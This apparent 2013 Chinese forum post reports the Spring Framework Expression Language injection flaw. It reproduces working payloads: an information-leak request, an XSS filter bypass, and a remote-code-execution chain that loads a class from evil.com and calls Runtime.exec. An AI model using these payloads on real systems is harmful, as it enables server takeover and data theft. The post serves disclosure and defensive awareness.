Spring远程代码执行漏洞

楼主^#

更多发布于：2013-01-26 14:52

[] 1


	上周也就是在1月16日左右，安全公司Aspect Security透露在Spring框架的开发代码中，发现了一个重大的安全漏洞。该漏洞被命名为“remote code with Expression Language injection”。他们发现，通过发送特定的Spring标签，可以导致服务器上的敏感数据暴露、执行任意代码等。（PS：该漏洞早在2011年就发现了，只是未对外公布。）图片：20130126113823784.jpg 威廉姆斯称，Spring未来版本中将有可能默认不启用表达式语言功能，但是，目前存在的这个漏洞，如果被攻击者利用，可能会对应用程序产生大的威胁。这是非常危险的，攻击者可以完全接管一个web应用程序，并在服务器上运行他们的代码。他还指出，该漏洞跟最近披露的浏览器java漏洞无任何联系。据提供开源组件的中央仓库Sonatype数据显示，目前已有超过2.2万个机构下载了超过130万次存在安全漏洞的Spring框架。下面节选了部分在Glassfish+EL 2.2远程执行代码的列子，完整Paper查看地址 0×01: 发起请求如下： http://vulnerable.com/foo?message=${applicationScope}页面如果包含 <spring:message text="" code="${param['message']}"></spring:message>会导致输出服务器的一些敏感信息，包括classpath和本地工作目录等。 0×02: 当应用程序做了过滤器，会对所有’<’和’>’进行过滤。利用Expression Language特性，可尝试如下绕过过滤： http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPPP发起该请求之后，当String.replaceAll方法被调用的时候。该语句会返回一段文本，并插入spring:message tag，返回的错误代码中会显示qqQQQQ。最终成功执行XSS，绕过过滤器的语句如下： http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”<”).replaceAll(“Q”,”>”)};foo=PscriptQalert(1);P/scriptQ根据老外放出的Paper，我们可以看到能成功执行任意代码。但是到目前为止，还没有任何快速修复补丁放出。因此，使用Spring框架的应用程序可能存在安全隐患，建议开发者关闭表达式语言功能。补充： 0×03:远程执行EXP 1.建立一个ArrayList以构造一个URLClassLoader，并且需要在session中存着，可以在后面利用。 ${pageContext.request.getSession().setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}2.通过URL对象载入远程执行的代码类 ${pageContext.request.getSession().getAttribute("arr").add(pageContext.getServletContext().getResource("/").toURI().create("http://evil.com/path/to/where/malicious/classfile/is/located/").toURL())}远程执行的代码类（运行一个计算器） public class Malicious { public Malicious() { try { java.lang.Runtime.getRuntime().exec("open -a Calculator"); //Mac java.lang.Runtime.getRuntime().exec("calc.exe"); //Win } catch (Exception e) { } }}3.执行代码，打开一个计算器（运行结果截图见上文） ${pageContext.getClass().getClassLoader().getParent().newInstance(pageContext.request.getSession().getAttribute("arr").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadClass("Malicious").newInstance()}关于Spring： Spring是一个开源框架，Sping 是于2003 年兴起的一个轻量级的Java 开发框架，由Rod Johnson 在其著作Expert One-On-One J2EE Development and Design中阐述的部分理念和原型衍生而来。它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而，Spring的用途不仅限于服务器端的开发。